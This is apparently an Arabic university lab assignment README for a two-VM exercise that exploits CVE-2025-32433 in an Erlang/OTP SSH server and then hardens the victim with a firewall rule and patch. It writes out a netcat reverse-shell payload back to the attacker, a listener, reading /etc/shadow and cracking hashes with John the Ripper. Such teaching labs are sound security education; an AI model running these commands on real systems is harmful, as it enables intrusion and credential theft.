
يحاكي هذا المشروع سيناريو هجوم ودفاع واقعي عبر جهازين افتراضيين. ستستغل ثغرة حرجة في تنفيذ الأوامر عن بُعد (RCE) قبل المصادقة (CVE-2025-32433) في خادم Erlang/OTP SSH، وتكسر تجزئات كلمات المرور المستخرجة، ثم تعزز الجهاز الضحية بقواعد جدار ناري وتصحيحات.
النقاط الإجمالية: 20 | الموعد النهائي: لا يُقبل أي تسليم متأخر
يحاكي هذا المشروع سيناريو هجوم ودفاع واقعي عبر جهازين افتراضيين. ستستغل ثغرة تنفيذ تعليمات برمجية عن بعد (RCE) حرجة قبل المصادقة (CVE-2025-32433) في خادم SSH الخاص بـ Erlang/OTP، وتكسر تجزئات كلمات المرور المستخرجة، ثم تعزز الجهاز الضحية بقواعد جدار الحماية والتصحيح.
| الدور | نظام التشغيل |
|---|---|
| المهاجم | Kali Linux |
| الضحية | Ubuntu/Debian (Erlang/OTP SSH v27.3.2) |
| الملف | الوصف |
|---|---|
Debian-1.ova | صورة جهاز افتراضي للضحية مُعدة مسبقًا — قم بتنزيلها بشكل منفصل، انظر الموارد (كبيرة جدًا لاستضافتها على GitHub) |
Debian-1.ova): رابط التحميل — كبير جدًا (~3 جيجابايت) لاستضافته على GitHub. قم بتنزيله بشكل منفصل واستيراده إلى VirtualBox/VMware كما هو موضح أدناه.rockyou_txt.txt): مضمنة في هذا المستودع، تُستخدم في خطوة كسر كلمة المرور في الجزء 2.Debian-1.ova وجهاز Kali Linux الافتراضي الخاص بك إلى VirtualBox/VMware.ifconfig للعثور على عنوان IP الخاص به (عادةً في 192.168.56.0/24).nmap -p 2222 -sV -A <victim-IP>
وثّق المنافذ المفتوحة وإصدارات الخدمات وتوقيعات Erlang.
قم بتحويل Kali مؤقتًا إلى NAT لاستنساخ المستودع، ثم ارجع إلى Host-Only.
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py
قم بتعديل البرنامج النصي — اضبط HOST = "<victim-IP>" وقم بتحديث الحمولة:
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'
الطرفية 1 (Kali) — ابدأ المستمع:
nc -lvnp 4444
الطرفية 2 (Kali) — شغّل الاستغلال:
python3 CVE-2025-32433.py
في الصدفة العكسية، قم بتشغيل whoami و hostname لتأكيد الوصول.
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt
# On Kali
john --wordlist=rockyou_txt.txt hash.txt
وثّق تنسيق التجزئة (على سبيل المثال، $6$ = SHA-512)، الوقت المستغرق، وكلمة المرور النصية الصريحة المستعادة.
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP
أعد تشغيل مسح Nmap والاستغلال من Kali — وثّق أن المنفذ 2222 أصبح الآن "مُصفّى (Filtered)" وأن الاستغلال يفشل.
وثّق الخطوات اللازمة لترقية Erlang/OTP إلى الإصدار v27.3.3 أو أحدث، الذي يحتوي على الإصلاح لـ CVE-2025-32433.
whoami/hostname)، التقاط العلمCVE-2025-32433 — تنفيذ تعليمات برمجية عن بعد حرج قبل المصادقة في خادم SSH الخاص بـ Erlang/OTP. يمكن استغلاله عن طريق إرسال حزم SSH غير صالحة قبل أي تبادل لبيانات الاعتماد، مما يمنح المهاجم غير المصادق وصولًا كاملاً إلى الصدفة.
Project Spring 2026 - Google Docs.pdf | تعليمات المشروع الكاملة مع التسليمات |
rockyou_txt.txt | قائمة كلمات مستخدمة مع John the Ripper لكسر تجزئة كلمة المرور المستخرجة |